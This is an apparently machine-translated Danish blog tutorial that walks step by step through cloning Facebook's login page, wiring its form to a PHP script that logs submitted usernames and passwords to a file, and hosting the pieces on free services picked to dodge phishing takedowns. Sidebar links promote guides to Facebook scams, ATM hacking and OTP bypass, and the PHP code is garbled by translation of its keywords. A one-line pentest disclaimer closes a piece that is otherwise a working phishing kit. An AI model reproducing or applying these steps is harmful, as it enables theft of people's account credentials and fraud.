Indholdsfortegnelse
Sådan oprettes et Facebook phishing-link
for nylig er jeg stødt på mange guider om oprettelse af phishing-sider. Selvom principperne bag hver guide er ens, fungerer de fleste af de hostingløsninger, der leveres i guiden, ikke længere på grund af en stigning i nedbruddet af phishing-sider fra hostingfirmaerne. I denne vejledning gennemgår jeg hvert trin, der er nødvendigt for at oprette og være vært for en phishing-side efter eget valg. God fornøjelse!
Hent HTML-indekset på målsiden
for at starte, skal du hente HTML-indekset på siden. Der er forskellige metoder til at gøre dette, der er endda skabeloner online til populære sider. I denne tutorial vil jeg bruge den mest basale måde for at være så noob-venlig som muligt.
Læs også: Sådan opretter du et phishing-site ved hjælp af kali linuk
Naviger til din hjemmeside
i denne tutorial, jeg vil phish Facebook.
se kilden til hjemmesiden.
afhængigt af din bro. ser kan der være forskellige metoder. Normalt gøres det ved at højreklikke på siden og klikke på “Vis Kilde”. Jeg har gjort det på min bro. ser, og et vindue skulle komme ud som dette:
på boksen til højre er kilden til hjemmesiden. Hvilket fører videre til næste trin:
henter og gemmer kildekoden
marker feltet, og kopier-indsæt alt i feltet i et tekstdokument. Brug Notesblok på vinduer og et simpelt tekstredigeringsprogram, hvis du ikke bruger vinduer. (Brug ikke programmer som ord eller sider, fordi det er virkelig langsomt). Når du har gjort det, skal du klikke på “Gem som” eller en hvilken som helst mulighed, der giver dig mulighed for at gemme dette dokument. På Notesblok skal det se sådan ud:
Skift “Gem som type” til alle filer og skift kodningen til Unicode.
navngiv derefter dokumentet ” indeks.html”, naturligvis uden talemærkerne.
Tillykke! Du er færdig med det første trin i selvstudiet!
Læs også: Sådan gør Facebook fidus uden blevet forbudt eller få blokeret
Lektion 2
oprettelse af en PHP fil til adgangskode høst
PHP-filen er dybest set det værktøj, der høster brugernes adgangskode i dette scenario. Der er flere måder, du kan oprette denne PHP på, hvis du har en vis programmeringskendskab, men hvis du ikke gør det, skal du bare kopiere min eksemplar PHP.
<?php
header (‘placering: facebook.com’);
$håndtag = fopen (“log.Tekst”, “a”);
foreach ($_POST som $ variabel => $værdi) {
skriv ($håndtag, $ variabel);
skriv ($håndtag, “=”);
skriv ($håndtag, $værdi);
skriv ($handle, “\ r \ n”);
}
skriv ($handle, “\ r \ n \ n \ n \ n”);
fclose ($håndtag);
Afslut;
?>
samme som ovenfor, Gem PHP-filen som” alle filer “og som” post.php”. Skift kodningen til Unicode, og du skal være klar til at gå!
Rediger sidens HTML-fil for at inkorporere din PHP-fil i den.
nu skal vi indarbejde vores PHP-fil for at modtage adgangskoder, som brugerne sender.
Find metoden til afsendelse af adgangskode
først skal du se, hvordan hjemmesiden handler, når brugeren sender et brugernavn-adgangskode.
for Facebook er alt hvad du skal gøre at Ctrl-F og skrive “=handling” i feltet.
nu skal du erstatte alt i den understregede del med “post.php”, hold talemærkerne. (bare et sæt venligst).
det er klart, at denne metode vil være anderledes for andre hjemmesider. En god metode til at finde det er ved at bruge inspicere elementer værktøj i de fleste moderne bro.sere og klikke på login-knappen. Find noget, der ligner ovenstående metode.
Læs også: Lær at hacke ATM-kort, maskiner, der bruger
Bemærk: du bliver nødt til at ændre dette senere, når du faktisk er vært for hjemmesiden.
Hosting PHP fil til adgangskode lagring
nu her er den saftige del, hvilket gør din falske hjemmeside online, så andre mennesker kan gennemse det.
du kan bruge alle gratis hosting-tjenester til at være vært for og gemme adgangskoder. Hostingplanen skal dog indeholde noget, der hedder “FTP”. Til denne tutorial vil jeg bruge 000.
Naviger til FTP-serveren for din hostingtjeneste
for dette trin antager jeg, at du allerede har oprettet en hjemmeside med din hostingtjeneste.
for 000 hosting skal du blot klikke på “File manager” og klikke på “Upload filer”. Her er et billede af FTP-serveren til 000:
Ignorer de andre filer, det er bare nogle af mine personlige ting, der ikke er relateret til denne tutorial.
Upload dine PHP-filer og skift tilladelse
som du kan se, har jeg allerede uploadet min PHP-fil. Men du skal bare uploade den til hovedmappen på din FTP-server. (Nogle FTP-servere tillader dig ikke at uploade til rodmappen, bare følg deres særlige instruktioner).
nu skal du ændre tilladelsen til “777”, som stort set er hver eneste tilladelse. Når du bliver bedt om at markere felter for tilladelserne, skal du bare markere hver enkelt.
nu Kan du lukke FTP-serveren. Bemærk din internetadresse!
Læs også: trin instruktioner til at omgå OTP verifikation på nogen hjemmesider
Hosting den faktiske Phishing side
til dette trin, skal du bruge den nøjagtige hosting udbyder, som jeg bruger, ellers vil du få forbudt.
der er en grund til, at jeg ikke bruger den samme hostingudbyder til min faktiske side, og det er fordi de fleste hostingudbydere vil anvende en slags scanning til at opdage phishing-sider. Jeg kan prøvet flere hosting-tjenester i fortiden, og alle af dem forbød mig inden for 30 minutter for at uploade indeksfilen.
konfiguration af indlægget.php Forum
husk nu indlægget, før du er vært for hjemmesiden.php / login formular ting vi konfigureret ovenfor?
du skal finde login-formularen igen i dit indeks.html og erstatte ” indlæg.php ” med ” http://yourwebsiteforyourpostphpupload/post.php”, forudsat at du uploadede til rodmappen. Husk at tilføje http: / / foran siden. For at teste dette skal du navigere til hjemmesiden (http://yourwebsiteforyourpostphpupload/post.php) og se om det omdirigerer dig til Facebook.med, hvis det gør det, har du indsat det rigtige sted. Hvis det ikke gør det, skal du dobbelttjekke, om du har uploadet din fil til den rigtige mappe.
Hosting den faktiske side
Naviger til htmlpasta.com. du vil se noget der ligner dette:
derefter skal du kopiere indekset.html-fil til din phishing site og indsætte det i her.
Klik nu på re og klik på Indsæt, du får et link til din hjemmeside.
Konklusion
Tillykke! Du er færdig med at være vært for dit første phishing-sted! Naviger til din side og prøv at indtaste nogle falske loginoplysninger, når du har klikket på login-knappen, det skal omdirigere dig til facebook.com. Log ind på din FTP-server, som du var vært for dit indlæg.php-fil, og der skal være et nyt dokument kaldet Log.tekst, der er gemt i den samme mappe som dit indlæg.php-fil. Eventuelle loginoplysninger skal gemmes der.
Læs også: 2020 yahoo yahoo format, billing format, pdf Hent
brug venligst ikke dette til ondsindet formål, brug kun til penetrationstest og med tilladelse fra dit offer.
